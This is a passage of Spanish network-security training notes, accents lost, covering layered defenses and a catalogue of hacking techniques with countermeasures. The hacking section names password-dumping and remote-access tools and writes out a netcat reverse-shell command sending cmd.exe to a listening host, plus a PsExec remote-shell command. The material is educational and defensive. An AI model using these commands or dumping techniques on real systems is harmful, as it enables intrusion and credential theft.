Por ltimo, compruebar que todo el hardware de red est fsicamente protegido. Si los servidores estn protegidos en una sala o armario con cerradura, los enrutadores y conmutadores adjuntos tambin deben estar protegidos fsicamente. De lo contrario, un intruso puede llegar fcilmente hasta un equipo porttil o de escritorio, y atacar a los servidores desde dentro del permetro. Una vez ms, se debe controlar la administracin de los dispositivos de red; de lo contrario, pueden utilizarse para perpetrar un ataque contra el resto de la infraestructura.
8.8. Descripcin del nivel perimetral
Cap1-15.jpg
El permetro de red es el rea de una red que est ms expuesta a un ataque del exterior. Los permetros de red se pueden conectar a numerosos entornos diferentes, que van desde socios comerciales a Internet. Cada organizacin usa criterios distintos para definir su permetro. Los criterios pueden incluir algunas o todas las conexiones descritas en la diapositiva.
8.9. Compromiso de la seguridad del nivel de permetro
Cap1-16.jpg
La mayora de los expertos en seguridad se centran en el rea desde la que cabe esperar que se origine un ataque, como Internet. Sin embargo, los intrusos tambin son conscientes de que sta ser la solucin que probablemente utilice e intentarn atacar la red desde algn otro lugar. Es muy importante que todas las entradas y salidas de la red sean seguras.
Es improbable que uno sea el responsable de la implementacin de seguridad de los socios comerciales; por lo tanto, no se puede confiar completamente en todo el acceso que se origine en ese entorno. Adems, no se tiene control del hardware de los usuarios remotos, lo que constituye otro motivo para no confiar en el mismo. Las sucursales podran no contener informacin confidencial y, por lo tanto, es posible que tengan una implementacin menos segura. Sin embargo, podran tener vnculos directos a la oficina principal que un intruso podra usar.
Es importante considerar la seguridad de la red en conjunto, no slo en reas individuales.
8.10. Proteccin del nivel de permetro
Cap1-17.jpg
La proteccin de los permetros se puede llevar a cabo principalmente con servidores de seguridad. La configuracin de un servidor de seguridad puede ser difcil desde el punto de vista tcnico. Por lo tanto, los procedimientos deben detallar claramente los requisitos.
Los sistemas operativos recientes de Microsoft Windows facilitan el bloqueo de los puertos de comunicacin innecesarios para reducir el perfil de ataque de un equipo.
La traduccin de direcciones de red (NAT, Network Address Translation) permite a una organizacin disimular las configuraciones de direcciones IP y de puertos internos para impedir que usuarios malintencionados ataquen los sistemas internos con informacin de red robada. Los mecanismos de seguridad del permetro pueden ocultar tambin los servicios internos, incluso aquellos que estn disponibles externamente, de modo que un intruso nunca se comunique de forma directa con ningn sistema que no sea el servidor de seguridad desde Internet.
Cuando los datos salen del entorno que est bajo la responsabilidad de uno, es importante que se encuentren en un estado que garantice su seguridad y que lleguen intactos a destino. Esto se puede conseguir mediante protocolos de tnel y cifrado, con el fin de crear una red privada virtual (VPN, Virtual Private Network).
El protocolo de tnel que emplean los sistemas de Microsoft es el Protocolo de tnel punto a punto (PPTP, Point-to-Point Tunneling Protocol), que utiliza Cifrado punto a punto de Microsoft (MPPE, Microsoft Point-to-Point Encryption), o Protocolo de tnel de nivel 2 (L2TP, Layer 2 Tunneling Protocol), que utiliza el cifrado de IPSec.
Cuando los equipos remotos establecen comunicacin a travs de una VPN, las organizaciones pueden seguir pasos adicionales para examinar esos equipos y garantizar que cumplan una directiva de seguridad predeterminada. Los sistemas que establecen la conexin se aslan en un rea independiente de la red hasta que se completan las comprobaciones de seguridad.
Los sistemas del permetro tambin deben tener usos claramente definidos. Bloquear o deshabilitar cualquier otra funcionalidad.
Firewall de Windows, que se incluye con Windows XP y Windows Server 2003, puede extender la proteccin del permetro a los usuarios remotos.
La proteccin del permetro de una red es el aspecto ms importante para parar un ataque del exterior. Si un permetro sigue siendo seguro, la red interna se debe proteger contra ataques externos. Se enumeran abajo algunas maneras de implementar la defensa del permetro:Packet Filtering, Inspeccin de paquetes, Intrusion Detection8.11. Descripcin del nivel de red interna
Cap1-18.jpg
Los ataques no provienen slo de orgenes externos. Tanto si los ataques internos son genuinos como si son meros accidentes, muchos sistemas y servicios se daan desde dentro las organizaciones.
Es importante implementar medidas internas de seguridad orientadas a las amenazas mal intencionadas y accidentales.
8.12. Compromiso de la seguridad del nivel de red interna
Cap1-19.jpg
El acceso a los sistemas y recursos de red internos permite a los intrusos obtener acceso fcilmente a los datos de la organizacin.
Mediante el acceso a la infraestructura de red tambin pueden supervisar la red e investigar el trfico que se est transportando. Las redes totalmente enrutadas, aunque hacen que la comunicacin sea ms fcil, permiten a los intrusos tener acceso a los recursos de la misma red independientemente de si se encuentran o no en ella.
Los sistemas operativos de red tienen instalados muchos servicios. Cada servicio de red constituye un posible medio de ataque.
8.13. Proteccin en el nivel de red internaUno puede tener una serie de redes en su organizacin y debe evaluar cada una individualmente para asegurarse de que est asegurada apropiadamente. Se enumeran abajo algunas maneras de implementar defensas de red:
VLAN Access Control Lists, Internal Firewall, Auditing, Intrusion Detection
Para proteger el entorno de la red interna, se debe requerir que cada usuario se autentique de forma segura en un controlador de dominio y en los recursos a los que tenga acceso. Utilizar la autenticacin mutua, de modo que el cliente tambin conozca la identidad del servidor, con el fin de impedir la copia accidental de datos a los sistemas de los intrusos.
Segmentar fsicamente los conmutadores, es decir, crear particiones de la red para impedir que toda ella est disponible desde un nico punto. Se puede crear particiones si se utilizan enrutadores y conmutadores de red independientes o si crean varias redes virtuales de rea local (VLAN, Virtual Local Area Network) en el mismo conmutador fsico.
Considerar cmo se van a administrar los dispositivos de red, como los conmutadores. Por ejemplo, el grupo de trabajo de red podra utilizar Telnet para tener acceso a un conmutador o enrutador y realizar cambios de configuracin. Telnet pasa todas las credenciales de seguridad en texto sin cifrar. Esto significa que los nombres y las contraseas de los usuarios son accesibles para cualquiera que pueda rastrear el segmento de red. Esto puede constituir una debilidad importante de la seguridad.
Considerar permitir nicamente el uso de un mtodo seguro y cifrado, como SSH de shell o acceso de terminal serie directo.
Tambin se deben proteger adecuadamente las copias de seguridad de las configuraciones de dispositivos de red. Las copias de seguridad pueden revelar informacin sobre la red que resulte til a un intruso. Si se detecta una punto dbil, se pueden utilizar copias de seguridad de la configuracin de los dispositivos para realizar una restauracin rpida de un dispositivo y revertir a una configuracin ms segura.
Restringir el trfico aunque est segmentado. Puede utilizar 802.1X para proporcionar un acceso cifrado y autenticado tanto en las LAN inalmbricas como en las estndar. Esta solucin permite utilizar cuentas de Active Directory y contraseas o certificados digitales para la autenticacin. Si se utilizan certificados, se tendr que integrar una infraestructura de clave pblica (PKI, Public Key Infrastructure), en Servicios de Windows Certificate Server; para las contraseas o certificados, tambin necesitar un servidor RADIUS integrado en el Servicio de autenticacin Internet (IAS, Internet Authentication Service) de Windows. En Windows Server 2003 se incluyen IAS y Servicios de Certificate Server.
Implementar tecnologas de cifrado y firma, por ejemplo la firma de IPSec o bloque de mensajes de servidor (SMB, Server Message Block), con el fin de impedir a los intrusos rastrear los paquetes de la red y reutilizarlos.
8.14. Descripcin del nivel de host
Cap1-20.jpg
Es probable que los sistemas de una red cumplan funciones especficas. Esto afectar a la seguridad que se les aplique.
8.15. Compromiso de la seguridad del nivel de host
Cap1-21.jpg
Se puede atacar a los hosts de red con funciones que se sabe que estn disponibles de forma predeterminada, aunque el servidor no las necesita para realizar su funcin.
Los intrusos tambin podran distribuir virus para emprender un ataque automatizado.
El software instalado en sistemas de equipos podra tener puntos dbiles que los intrusos pueden aprovechar. Es importante permanecer informado de todos los problemas de seguridad del software de su entorno.
8.16. Proteccin en el nivel de hostSe debe evaluar cada host en su ambiente y crear las polticas que limitan cada servidor solamente a esas tareas que se tienen que realizar. Esto crea otra barrera de seguridad que un atacante necesitara evitar antes de hacer cualquier dao.Server Hardening, Host Intrusion Detection, IPSec Filtering, Auditing
Tanto en los sistemas cliente como en los servidores, las tcnicas de refuerzo dependern de la funcin del equipo. En cada caso, se pueden utilizar plantillas de seguridad y plantillas administrativas con directivas de grupo para proteger estos sistemas.
En los sistemas cliente, tambin se pueden utilizar directivas de grupo para restringir los privilegios de los usuarios y controlar la instalacin de software. El uso de directivas de grupo para limitar las aplicaciones que un usuario puede ejecutar impide que ste ejecute de forma inadvertida cdigo de tipo Caballo de Troya.
En los sistemas de servidor, las tcnicas de refuerzo tambin incluyen la aplicacin de permisos NTFS, la configuracin de directivas de auditora, el filtrado de puertos y la realizacin de tareas adicionales segn la funcin del servidor.
Mantener el servidor y el cliente actualizados con respecto a las actualizaciones tambin mejora la seguridad. Microsoft proporciona varias formas de aplicar revisiones a los sistemas, por ejemplo, mediante Windows Update, Software Update Service y Microsoft Systems Management Server (SMS).
La utilizacin de un paquete antivirus actual y de un servidor de seguridad personal, como Firewall de Windows, disponible con Windows XP y con los sistemas operativos posteriores, puede reducir mucho la parte expuesta a un ataque de un equipo cliente.
8.17. Descripcin del nivel de aplicacin
Cap1-22.jpg
Las aplicaciones de red permiten que los clientes tengan acceso a los datos y los traten. Tambin constituyen un punto de acceso al servidor donde se ejecutan las mismas.
Recordar que la aplicacin proporciona un servicio a la red. Este servicio no debe anularse con la implementacin de seguridad.
Examinar las aplicaciones desarrolladas internamente, adems de las comerciales, en busca de problemas de seguridad.
8.18. Compromiso de la seguridad del nivel de aplicacin
Cap1-23.jpg Los intrusos cuyo inters son las aplicaciones pueden bloquear alguna para conseguir que su funcionalidad deje de estar disponible.
Las aplicaciones pueden tener defectos que los atacantes pueden manipular para ejecutar cdigo malintencionado en el sistema.
Un intruso podra utilizar en exceso un servicio de modo que se imposibilite su uso legtimo; ste es un tipo de ataque de denegacin de servicio.
Una aplicacin tambin podra utilizarse para llevar a cabo tareas para las que no est destinada, como enrutar correo electrnico.
8.19. Proteccin en el nivel de aplicacinComo otra capa de defensa, Application Hardening es una parte esencial de cualquier modelo de seguridad. Cada aplicativo en una organizacin debe ser probado a fondo para la conformidad de seguridad en un ambiente de prueba antes de que se permita su puesta en produccin.
Validation Checks, Verify HTML / Cookies Source, Secure IIS
Las instalaciones de las aplicaciones slo deberan incluir los servicios y funcionalidad requeridos.
Las aplicaciones desarrolladas internamente se deben evaluar para descubrir vulnerabilidades en la seguridad de una forma continuada y deben desarrollarse e implementarse revisiones para cualquier vulnerabilidad que se identifique.
Las aplicaciones que se ejecutan en la red se deben instalar de forma segura y se les deben aplicar todas las revisiones y Service Packs correspondientes.
Debe ejecutarse software antivirus para ayudar a impedir la ejecucin de cdigo malintencionado.
Si una aplicacin se ve comprometida, es posible que el intruso pueda tener acceso al sistema con los mismos privilegios con los que se ejecuta la aplicacin. Por lo tanto, ejecutar los servicios y aplicaciones con el menor privilegio necesario.
Al desarrollar nuevas aplicaciones personalizadas, implementar las recomendaciones ms recientes de ingeniera de seguridad.
8.20. Descripcin del nivel de datos
Cap1-24.jpg
El nivel final lo constituyen los datos. Los sistemas de equipos almacenan, procesan y ofrecen datos. Cuando los datos se procesan en un formato con significado, se convierten en informacin til.
Los datos sin formato y la informacin que se almacena en un sistema son objetivos de un posible ataque. El sistema mantiene los datos en medios de almacenamiento masivo, generalmente en un disco duro.
Todas las versiones recientes de Microsoft Windows admiten varios sistemas de archivos para almacenar y tener acceso a los archivos en un disco. Uno de estos sistemas, NTFS, se puede utilizar en Microsoft Windows NT, Windows 2000, Windows XP y Microsoft Windows Server 2003. Proporciona tanto permisos de archivo como de carpeta para ayudar a proteger los datos.
NTFS admite caractersticas adicionales, como la auditora y el Sistema de archivos de cifrado (EFS, Encrypting File System), que se utiliza para implementar la seguridad en los datos.
8.21. Compromiso de la seguridad del nivel de datos
Cap1-25.jpg
Los intrusos que obtienen acceso a un sistema de archivos pueden hacer un dao enorme u obtener gran cantidad de informacin. Pueden ver archivos de datos y documentos, algunos de los cuales tal vez contengan informacin confidencial. Tambin pueden cambiar o quitar la informacin, lo que puede ocasionar varios problemas a una organizacin.
El servicio de directorio Active Directory utiliza los archivos del disco para almacenar la informacin del directorio. Estos archivos se almacenan en una ubicacin predeterminada cuando el sistema se promueve a controlador de dominio. Como parte del proceso de promocin, sera aconsejable almacenar los archivos en algn lugar diferente de la ubicacin predeterminada porque de este modo quedaran ocultos de los intrusos. Dado que los nombres de los archivos son conocidos (tienen el nombre de archivo NTDS.dit), si nicamente se reubican es probable que slo se consiga entorpecer el trabajo del intruso. Si los archivos de directorio se ven comprometidos, todo el entorno del dominio queda expuesto al riesgo.
Los archivos de aplicacin tambin se almacenan en disco y estn expuestos a un ataque, con lo que se ofrece a los intrusos la oportunidad de interrumpir la aplicacin o manipularla con fines malintencionados.
8.22. Proteccin en el nivel de datos EFS permite el cifrado de los archivos cuando residen en el sistema de archivos. Se basa en el formato NTFS del disco, que est disponible desde Windows 2000. Es importante entender que EFS no cifra los archivos mientras se estn transmitiendo a travs de una red. El proceso de cifrado utiliza una clave para cifrar el archivo y la tecnologa de claves pblica y privada para proteger dicha clave.
NTFS tambin proporciona seguridad en los archivos y en las carpetas. De este modo, se permite la creacin de listas de control de acceso para definir quin ha obtenido acceso a un archivo y qu acceso tiene.
El aumento de la proteccin del nivel de datos debe incluir una combinacin de listas de control de acceso y cifrado. Al cifrar un archivo, nicamente se impide la lectura no autorizada; no se evita ninguna accin que no requiera la lectura del archivo, como la eliminacin. Para impedir la eliminacin, utilice listas de control de acceso.
Puesto que los datos son esenciales en muchos negocios, es importante que su recuperacin sea un proceso conocido y probado. Si se realizan copias de seguridad con regularidad, cualquier alteracin o eliminacin de datos, ya sea accidental o malintencionada, puede recuperarse a partir de las copias de seguridad cuando corresponda. Un proceso confiable de copia de seguridad y restauracin es vital en cualquier entorno. Adems, se deben proteger las cintas de copia de seguridad y restauracin. Las copias de las cintas de copia de seguridad y restauracin se debe mantener en otro lugar, en una ubicacin segura. El acceso no autorizado a las cintas de copia de seguridad es igual de daino que infringir la seguridad fsica de la infraestructura.
Las listas de control de acceso slo funcionan en documentos dentro del sistema de archivos para el que se hayan habilitado. Una vez que se han copiado los documentos a otra ubicacin (por ejemplo, a la unidad de disco duro local de un usuario), no se sigue controlando el acceso. Windows Rights Management Services (RMS), que se incluye con Windows Server 2003, mueve la funcin de control de acceso al propio objeto de forma que dicho control se aplica independientemente de dnde se almacene el documento fsico. RMS tambin ofrece a los creadores de contenido un mayor control sobre las acciones particulares que un usuario tiene permitido llevar a cabo; por ejemplo, el destinatario puede tener concedido acceso para leer un documento, pero no para imprimir o copiar y pegar; en el correo electrnico enviado con Microsoft Office Outlook 2003, el remitente del mensaje puede impedir que los destinatarios reenven el mensaje.
9. Respuesta a incidentes de seguridadEn este tema, se explicar cmo responder a incidentes de seguridad. Especficamente, se tratar:
El uso de una lista de comprobacin de respuesta a incidentes.
La contencin de los efectos de un ataque.
9.1. Determinacin de Riesgos de Seguridad
Cap1-32.jpg
Para determinar riesgos de seguridad, puede ayudar el preguntarse "cul sera el dao al negocio si" Intente pensar en qu se pueden comprometer su red y cmo afectar el negocio. stos pueden incluir aplicativos de lnea de negocio, datos del cliente, etctera.
Una vez que se haya formulado una lista, identificar qu puede daar su negocio ms, si est comprometido. Los daos posibles pueden incluir:
Tiempo muerto
Prdida de negocio
Reputacin daada
Confianza del cliente
Uso fraudulento de la informacin
Responsabilidad Legal
Despus que usted ha determinado los posibles riesgos, pregntese "qu puedo yo hacer para atenuar el riesgo?"
Para ms informacin, ir a Microsoft Press book Windows Security Resource Kit as como en Microsoft Solution for Securing Windows 2000 http://go.microsoft.com/fwlink/?LinkId=148379.2. Tecnicas de Hacking
Cap1-33.jpg
Footprinting
Scanning
Enumeration
Gaining Access
Privilege Escalation
Buffer Overflows
Shovel a Shell
Interactive Control
Camouflaging
Intelligence Gathering
Island Hopping
Denial of Service
Social EngineeringLuego, mirar algunas tcnicas comunes de hacking. Cuanto ms se aprende sobre las tcnicas usadas por el hacker, mejor se puede proteger una red contra estas tcnicas.
Nota: Esto no es un manual de cmo atacar sistemas pero es en algo una descripcin de las tcnicas usadas por los atacantes. 9.2.1. Tecnicas de Hacking: Footprinting
El uso de un atacante de herramientas y de la informacin para crear un perfil completo de la postura de la seguridad de una organizacin se conoce como footprinting. Por ejemplo, antes de que un hacker ataque una red, el/ella quiere conocer la informacin que incluye:
Presencia en Internet/ extranet de la compaa
La poltica de la compaa con respecto al acceso remoto
La versin utilizada de software en los servers (IIS, Exchange etc)
Los rangos IP de los cuales es propietaria la organizacion
Desafos tcnicos hechos por la compaa
Las fusiones o las adquisiciones que terminaron recientemente, estan en marcha o pendientes
Hay muchas herramientas que pueden ayudar a un hacker a poner junta toda la informacin sobre una compaa. Puede ser tan simple como usar un Search Engine para encontrar la informacin tal como la que fija el detalle tcnico de un administrador, usar al USENET o detalles incluidos en publicidad de una compaa.
Ms informacin un atacante tiene antes de comenzar su ataque y por lo tanto ms fcil ser para que apunten una debilidad especfica en la infraestructura.
9.2.2. Tcnicas de Hacking: Scanning
Como resultado del footprinting, un hacker puede identificar la lista de red y las direcciones IP utilizadas en la compaa. El siguiente paso lgico para un hacker es el scanning. El uso de un atacante de herramientas y de la informacin es para determinar qu sistemas estas vivos y accesibles desde Internet as como qu puertos estn escuchando en cualquier sistema dado. Con ese conocimiento, el atacante puede apuntar los sistemas especficos que funcionan con software o servicios especficos usando exploit conocidos.
9.2.3. Tcnicas de Hacking: Enumeration
Enumeration implica el uso de un atacante de herramientas para obtener la informacin detallada sobre un sistema remoto - por ejemplo servicios ejecutndose, todos los shares, cuentas de usuario, grupos, miembros de un dominio, politicas de cuentas (lockout, password age, etc.
Un hacker tpicamente utiliza enumeration no intrusiva probando si la informacin que obtuvo es suficiente para un ataque.Nota:
RestrictAnonymous = 1 es derrotado fcilmente por las ultimas herramientas de enumeracin (NBTEnum2.1.exe, DumpSec) RestrictAnonymous=2 puede afectar la funcionalidad. Es esencial probar sistemas crticos para asegurarse de que los cambios de la seguridad no afectarn sistemas de produccin de una manera negativa. Renonbrar las cuentas administrativas es un buen punto para no utilizar RestrictAnonymous configurado con valor =2 o bloquear el acceso a puertos. NetBIOS una variedad de herramientas tienen la habilidad de poder determinar cuentas administrativas basadas en SID / RID enumerados va queries NetBIOS.
Propsito:
Usar la informacin detallada acerca del sistema remoto, servicios, shares, cuentas de usuarios, grupos, informacin de controladores de dominio, polticas de cuentas, etc, habilita al atacante a utilizar herramientas con el intento de atacar la seguridad de cuentas y servicios en el objetivo. 9.2.4. Tcnicas de Hacking: Port Redirection
Cuando se tiene configurado un firewall para bloquear determinados puertos de acceso entrante, un hacker puede usar port redirection como camino de acceso a la red. Port redirection es utilizado para escuchar en algunos puertos. Los paquetes son redireccionados a destinos especficos.
Nota:
El Port Redirector tiene que instalarse en un servidor detrs de un firewall.
Usar algn otro exploit (IIS buffer overflow, etc.). El resto de las pautas de seguridad atenuarn a menudo el riesgo de este tipo de ataque.
Utilizar una poltica IPSec para permitir el acceso a los puertos abiertos de las mquinas especficas.
El filtrado de ingreso parece ser usualmente la parte importante, pero el filtrado de egreso es importante tambin!
En otras palabras si un IIS Server solamente necesita hablar con un solo COM+ server en una DMZ en un puado de puertos, configurar una politica IPSec para hacer cumplir esta poltica, no permitir al server IIS para comunicarse con cualquier servidor en la red en cualquier puerto, filtro es trfico de salida tambin!
Tambin, estar enterado del tipo de excedente de trfico en cualquier puerto dado. Si se ve el trfico ICMP que debe tener una carga til cero del octeto o contener una carga til 500k o de trfico de TFTP en el puerto 80, eso debe alertar, ms an si no es parte de sus operaciones estndares.
Propsito:
Despus que el atacante tiene identificado y accede al trafico del firewall que puede permitir trfico de entrada de un puerto origen 53, procurar instalar un software Port Redirector en el equipo dentro del firewall. El Port Redirector tomar el trfico entrante destinado para un puerto (53) y lo enviar a otro equipo detrs del firewall en otro puerto (3389).
Ejemplo:
FPipe.exe herramienta port redirection de linea de commandos
Contramedidas:
El Port Redirector tiene que instalarse de alguna manera en un servidor detrs del firewall usando otro exploit (IIS buffer overflow, etc.). El resto de las guas de seguridad atenuarn el riesgo de este tipo de ataque.
Usar una poltica de IPSec para permitir solamente el acceso a los puertos abiertos de las mquinas especficas.
9.2.5. Tcnicas de Hacking: Gaining Access
Hay varias herramientas disponibles que pueden permitir a un hacker tomar control de un sistema. Por ejemplo, Samdump y Brutus son crackers de passwords. Samdump se utiliza extraer el hashes del password de los archivos SAM. Brutus es un cracker de password remoto. Si un hacker consigue el acceso a una copia de una base de datos SAM, el hacker podra utilizar l0phtcrack y extraer los usuarios y passwords exactos.
ATACAR LA SAM MIENTRAS QUE EST EN LNEA
Propsito:
Los atacantes consiguen los password hashes de la SAM en un sistema en lnea para comprometer cuentas adicionales.
Utilizan las herramientas por ejemplo PWdump2 que utiliza una tcnica conocida como DLL injection para inyectar cdigo malicioso en LSASS.EXE (a trusted process). LSASS puede solicitar password hashes desencriptados para saltear la proteccin de SYSKEY.
Ejemplos:
Samdump
Pwdump1,2,3,3e
LC3 / LC4
Contramedidas:
SYSKEY est habilitado por defecto en Windows 2000 en modo 0 y encripta con hashes de 128bit. La key para desencriptar se guarda en registry.
Herramientas recientes como PWDump3,3e & LC3 (que usan PWDump) pueden sortear todas las protecciones de SYSKEY en todos los modos para extraer los passwords.
Evitar que un atacante descargue hashes es la mejor contramedida pero para el aseguramiento agregado hacer el siguiente:
Desabilitar la posibilidad de guardar los LM hashed password en registry (habilitado por defecto).
Cambiar todos los passwords luego de hacer esto!
Requerir password complejas (recomendado 15 caracteres alfanumricos ej. !@#$%^&*-)
ATACAR UNA COPIA FUERA DE LNEA DE LA SAM
Propsito:
Existen numerosos exploits de IIS para obtener una copia de la SAM.
El acceso fsico incorrecto puede conceder el acceso a la SAM
Ej. ERD disk olvidado en el Floppy Drive, administradores locales se olvidan de bloquear la consola.
Esto permite obtener una copia de la SAM con el fin el conseguir hashes!
Ejemplo
CHNTPW es una herramienta que funciona con UNIX y DOS. Un UNIX boot floppy est disponible y puede obtener una copia de la SAM, SYSTEM y SECURITY en una RAM drive para directamente ver y editar con CHNTPW.
Si la proteccin SYSKEY est habilitada (esto es por defecto en la SAM de Windows 2000), CHNTPW no puede desencriptar los hashes almacenados en la SAM pero puede escribir nuevos hashes en esta SAM habilitando al atacante el cambio de password para una cuenta (ej. administrator). Con esta cuenta, luego puede iniciar sesin y obtener el resto de las password (usando PWDump3 etc.).
Contramedidas
No permitir la copia de la SAM.
Deshabilitar el almacenamiento de LM hashed password en la SAM.
Habilitar SYSKEY en modo 2 o 3 para requerir una password un floppy que contenga la key privada antes de poder iniciar sesion.
Si un atacante puede inhabilitar SYSKEY y escribir una nueva password para el administrador en la SAM, todos los password hashes del resto de las cuentas continuan encriptados y protegidos del ataque.
Notas: Para deshabilitar el almacenamiento de LM hash en la SAM refirase a la siguiente KB: Q299656 New Registry Key to Remove LM Hashes from AD & SAM http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q299656
SYSKEY fue dasarrollado para encriptar todos los password hashes en la SAM para prevenir cracking fuera de lnea (Q143475 Windows NT System Key Permits Strong Encryption of the SAM)
http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q143475)
No habilitado por defecto en NT 4.0, habilitado en modo 0 en Windows 2000.
9.2.6. Tcnicas de Hacking: Privilege Escalation
Un hacker puede causar la mayora del dao consiguiendo privilegios administrativos en una red. Hay varias utilidades que un hacker puede utilizar para ganar privilegio administrativo. Por ejemplo, la utilidad Getadmin.exe es usada para otorgar a usuarios comunes privilegios administrativos agregando a estos usuarios al grupo de administradores. Esta utilidad funciona con todas las cuentas excepto con la cuenta de Guest.
Es importante observar que cualquier cuenta se haya concedido el Debug Programs right. Siempre se podr ejecutar satisfactoriamente Getadmin.exe, incluso despus de la aplicacin del hotfix. Esto es porque el Debug Programs right habilita al usuario a adjuntar cualquier proceso. El Debug Programs right es inicialmente otorgado a Administradores y debe ser utilizado nicamente con usuarios altamente confiables.
Tambin, si Getadmin.exe se ejecuta con una cuenta que sea ya un miembro del grupo local de los administradores, continua funcionando (incluso luego de aplicar el hotfix).
Nota: Para mas informacin dirigirse a:
http://support.microsoft.com/default.aspx?scid=kb;en-us;146965
9.2.7. Tenicas de Hacking: Buffer Overflows
Algunas herramientas de ataque ejecutan cdigo de buffer overruns. Sobreescribiendo segmentos especficos de la memoria, el atacante puede volver a dirigir una llamada de la memoria dentro de un programa para llamar su propio cdigo en vez del cdigo previsto. Tal llamada funcionara en el contexto de seguridad del proceso que lo llama ms que el nivel de privilegio del usuario.
Propsito:
Las herramientas BO overflow un-checked buffers generan cdigo en aplicaciones de Server para causar shellcode y ejecutarse (usualmente en contexto SYSTEM o IWAM si explota IIS / SQL etc.)
Ejemplos:
JILL-WIN32.EXE
Explota IIS .printer overflow
IIS5hack.exe
ISPC.EXE
Exploits IIS .idq overflow
Unicodeloader.pl
HTTPODBC.DLL
SQL buffer overflows
Contramedidas:
Mantener al dia los hotfixes
Deshabilitar servicios innecesarios
Denegar protocolos no necesarios en router / firewall (filtrado ingreso/egreso)
Emplear un sistema IDS actualizado para denegar pedidos sospechosos / conocidos como attack signaturas.
9.2.8. Tcnicas de Hacking: Shovel a Shell
Propsito:
Herramientas de shell Remoto habilitan a los atacantes a acceder al remote command shell en el servidor destino. Los atacantes usan remote shell para elevar sus privilegios.
Ejemplos:
Netcat
Nc.exe prove una conexion raw a servidores remotos via TCP.
Puede funcionar como un servidor o un cliente
Cryptcat, es igual que Netcat pero encripta los datos via un canal TCP
Nc.exe 10.1.1.10 5000 e cmd.exe
shovel a shell de un servidor comprometido de nuevo a una mquina remota cliente que funciona escuchando en la direccin 10.1.1.10 en el puerto 5000
PSExec.exe \\192.168.1.1 cmd.exe
Requiere acceso administrativo
Requiere acceso a NetBIOS (TCP 139)
Este comando contacta al servidor 192.168.1.1 , ejecuta en forma remota CMD.EXE y conecta con la command shell del cliente.
Contramedidas:
Netcat (nc.exe) puede establecer una conexin TCP al servidor destino en cualquier Puerto que est escuchando y no sea utilizado. Es por eso que un filtrado apropiado en el firewall previene este tipo de ataque.
Politicas IPSec para habilitar trafico entrante nicamente a los Puertos donde corren servicios es un mtodo eficaz (slo habilitar trafico en el puerto 80 en servidores IIS, denegar todo el trafico en otros puertos)
9.2.9. Tcnicas de Hacking: Interactive Control
Propsito:
Llamados como RATs (Remote Administration Tools).
stas son herramientas reales y cautelosas de Administracion Remota contenidas en .exe llamados aleatoriamente (o camuflados en legitimos .exe). Eso permite que un usuario remoto realice cualquier accin remotamente va un puerto a su elecion sin un usuario local del sistema que lo habilite!
Caractersticas populares: Keystroke logging, dedicados a grabar password de servicios populares (AIM, ICQ, File shares etc.), tienen la habilidad de crear file shares, transferir files, remote desktop, remote execution, reboot system, etc.
Ejemplos:
Sub7, BO2k, NetBus, NT Rootkit
Sub7 es el ms popular / NT Rootkit es el ms avanzado
Contramedidas:
Puesto que la mayora de los Trojanos escucha en un puerto para habilitar el acceso remoto del atacante, un filtrado apropiado de puertos sera lo indicado para prevenir este ataque.
La mayora de los productos anti-virus detectarn a stos y sus variantes pero hay literalmente millares de variantes nuevas que aparecen a cada hora
Usualmente llegan como archivos adjuntos va e-mail; por eso no habilitar e-mail / internet browsing en servers y controlar los adjuntos a travs de Outlook/Exchange Email Security functionality, Software Restriction Policies, Filtros en los SMTP gateway o mail server etc.
La mayora de los Trojanos intentan modificar Run / RunOnce y otras configuraciones de typo auto-run. Puede utilizarse software de monitoreo como NetIQ que puede avisar por medio de alertas sobre eventos de modificacin de estas keys de registry. Aplicando permisos de ACLs a estas keys, se puede reducir (pero no eliminar) estos ataques.
9.2.10. Tecnicas de Hacking: Camouflaging
Despus que un hacker logra la entrada en una red, tratar de no dejar rastros de su presencia y su paso a los Administradores. Hay varias herramientas que un hacker puede utilizar. Por ejemplo, WinZapper y Elsave pueden ser utilizadas para borrar registros de los logs de eventos.
NT Rootkits es utilizado a veces por un atacante. En tal ataque, son reemplazados ciertos archivos con versiones modificadas. Cuando un administrador utiliza el ejecutable, el atacante obtiene informacin adicional para continuar su ataque. Semejantemente, los elementos especficos de salida se pueden enmascarar por rootkit para camuflar las herramientas de ataque que se ejecutan en el sistema. Un acercamiento comn para detectar archivos modificados es comparar la versin en el hash de un archivo limpio. Es importante observar que la comparacin se debe hacer en una mquina limpia usando medios confiables, pues es tambin es posible que cualquier utilidad del ataque haya comprometido el sistema en cuestin.
Propsito:
Alertar a el atacante que alguien est investigando.
Se puede utilizar para ejecutar programas destructivos en nombre del Administrador o instalar backdoor trojans.
Ejemplos:
Sobreescribir los comandos del sistema con comandos del trojano.
Reemplazar tlist.exe, kill.exe etc, con versiones especiales que no listen o detengan procesos del atacante.
Sobreescribir CMD.EXE con una versin del atacante.
Contramedidas:
Generar las keys MD5 para todos los archivos del sistema importantes y comprobar hashes con frecuencia.
Configurar una auditoria adecuada de archivos.
Usar permisos apropiados sobre los archivos.
9.2.11. Tcnicas de Hacking: Intelligence Gathering
SNIFFING
Propsito:
Despus de utilizar un sniffer el atacante est en condiciones de obtener nombres de cuentas y passwords que pasen por la red en texto plano.
Puede ser utilizado para descubrir otras redes / equipos que pueden estar comprometidos en un futuro.
Puede ser utilizado para descubrir otros sniffers.
Netmon utilizabroadcasts del protocolo BONE.
Los equipos Windows por defecto responden pedidos ARP (Unix puede restringir respuestas ARP)
Ejemplos:
WinDump sniffer de lnea de comandos para Windows es similar a TCPDump para Unix
Ethereal GUI OSS sniffer similar al network monitor
ScoopLM dedicado a NTLM hash sniffer
LC3 usado para captura de hash
Contramedidas:
Usar la ultima versin de NTLM V2 o Kerberos (recomendado) en todos los equipos de la red.
Usar IPSec para encriptar el trafico de red.
Usar redes switcheadas para evitar la captura de paquetes.
9.2.12. Tcnicas de Hacking: Island Hopping
Island Hopping es una tcnica de Hacking en la cual el hacker incorpora una red de ordenadores dbiles y despus se traslada a partes ms seguras de la red. Esencialmente, estn utilizando las mismas tcnicas discutidas previamente para ampliar su influencia dentro de un ambiente dado de red. Una cosa es para un atacante comprometer un web server sin inters y sin la seguridad apropiada. Es algo mucho ms atractivo la red corporativa entera donde existen datos ms interesantes para la compaa.
HASH CRAMMING
